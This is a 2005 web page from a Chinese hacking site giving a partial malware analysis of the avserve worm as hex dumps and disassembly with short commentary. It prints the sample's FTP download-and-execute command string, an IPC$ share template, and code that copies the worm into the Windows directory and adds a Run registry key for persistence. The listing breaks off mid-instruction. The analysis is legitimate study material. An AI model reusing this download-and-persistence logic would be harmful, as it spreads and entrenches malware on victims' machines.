 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| avserve病毒初步分析 | |||||
作者:mejy 文章来源:http://blog.csdn.net/sunwear 点击数: 更新时间:2005-2-15  |
|||||
|
004069B8 6E 26 66 74 70 20 2D 73 3A 63 6D 64 2E 66 74 70 n&ftp -s:cmd.ftp 004069C8 26 25 69 5F 75 70 2E 65 78 65 26 65 63 68 6F 20 &%i_up.exe&echo 004069D8 6F 66 66 26 64 65 6C 20 63 6D 64 2E 66 74 70 26 off&del cmd.ftp& 004069E8 65 63 68 6F 20 6F 6E 0A 00 00 00 00 31 32 37 2E echo on.....127. 004069F8 30 2E 30 2E 31 00 00 00 25 73 25 63 00 00 00 00 0.0.1...%s%c.... 00406A08 5C 5C 25 73 5C 69 70 63 24 00 00 00 EB 06 \\%s\ipc$...?? 这个应该是干坏事的东西吧(估计) 004026C0 /$ 8B4C24 04 MOV ECX,DWORD PTR SS:[ESP+4] 省略一部分,大家可以自己跟进 0040271C |. EB 03 JMP SHORT dumped_.00402721 0040271E |> 8D79 FC LEA EDI,DWORD PTR DS:[ECX-4] 00402721 |> 8B4C24 0C MOV ECX,DWORD PTR SS:[ESP+C] avserve.exe病毒的另一副本名称 00402725 |. F7C1 03000000 TEST ECX,3 省略一部分 0040279F \. C3 RETN 004020C7 |. 59 POP ECX 004020C8 |. 59 POP ECX 004020C9 |> FF35 C8684000 PUSH DWORD PTR DS:[4068C8] ; dumped_.00406920 004020CF |. 8D85 DCFBFFFF LEA EAX,DWORD PTR SS:[EBP-424] 004020D5 |. 50 PUSH EAX 004020D6 |. E8 E5050000 CALL dumped_.004026C0 004020DB |. 807D 08 00 CMP BYTE PTR SS:[EBP+8],0 004020DF |. 59 POP ECX 004020E0 |. 59 POP ECX 004020E1 |. 74 16 JE SHORT dumped_.004020F9 这里判断你的Windows安装目录下面有没有avserve.exe文件没有下面就复制 004020E3 |. 8D85 DCFBFFFF LEA EAX,DWORD PTR SS:[EBP-424] 004020E9 |. 6A 00 PUSH 0 ; /FailIfExists = FALSE 004020EB |. 50 PUSH EAX ; |NewFileName 004020EC |. 8D85 DCF7FFFF LEA EAX,DWORD PTR SS:[EBP-824] ; | 004020F2 |. 50 PUSH EAX ; |ExistingFileName 004020F3 |. FF15 48504000 CALL DWORD PTR DS:[<&kernel32.CopyFileA>>; \CopyFileA 自动复制 004020F9 |> 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 004020FC |. 50 PUSH EAX ; /pHandle 004020FD |. 68 806A4000 PUSH dumped_.00406A80 ; |Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" 00402102 |. 68 02000080 PUSH 80000002 ; |hKey = HKEY_LOCAL_MACHINE 00402107 |. FF15 04504000 CALL DWORD PTR DS:[<&advapi32.RegOpenKey>; \RegOpenKeyA 这里很明显了改你的注册表,使程序自己开机自动执行 0040210D |. 8D85 DCFBFFFF LEA EAX,DWORD PTR SS:[EBP-424] 00402113 |. 50 PUSH EAX 00402114 |. E8 27000000 CALL dumped_.00402140 00402119 |. 59 POP ECX 0040211A |. 50 PUSH EAX ; /BufSize 0040211B |. 8D85 DCFBFFFF LEA EAX,DWORD PTR SS:[EBP-424] ; | 00402121 |. 50 PUSH EAX ; |Buffer 00402122 |. 6A 01 PUSH 1 ; |ValueType = REG_SZ 00402124 |. 6A 00 PUSH 0 ; |Reserved = 0 00402126 |. FF35 C8684000 PUSH DWORD PTR DS:[4068C8] ; |ValueName = "avserve.exe" 0040212C |. FF75 FC PUSH DWORD PTR SS:[EBP-4] ; |hKey 0040212F |. FF15 08504000 CALL DWORD PTR DS:[<&advapi32.RegSetValu>; \RegSetValueExA 00402135 |. FF75 FC PUSH DWORD PTR SS:[EBP-4] ; /hKey 00402138 |. FF15 0C504000 CALL DWORD PTR DS:[<&advapi32.RegCloseKe>; \RegCloseKey 0040213E |. C9 LEAVE 0040213F \. C3 RETN 这里就完了。回去下面干坏事了 ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× 00402003 |. 59 POP ECX 00402004 |. 59 POP ECX 00402005 |. E8 1EF0FFFF CALL dumped_.00401028 0040200A |. 33F6 XOR ESI,ESI 0040200C |. 68 746A4000 PUSH dumped_.00406A74 ; /MutexName = "Jobaka3l" 00402011 |. 56 PUSH ESI ; |InitialOwner => FALSE 00402012 |. 56 PUSH ESI ; |pSecurity => NULL 00402013 |. FF15 40504000 CALL DWORD PTR DS:[<&kernel32.CreateMute>; \CreateMutexA 创建一个信号量,目的何在? 00402019 |. FF15 3C504000 CALL DWORD PTR DS:[<&kernel32.GetLastErr>; [GetLastError 0040201F |. 3D B7000000 CMP EAX,0B7 00402024 |. 75 07&n |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
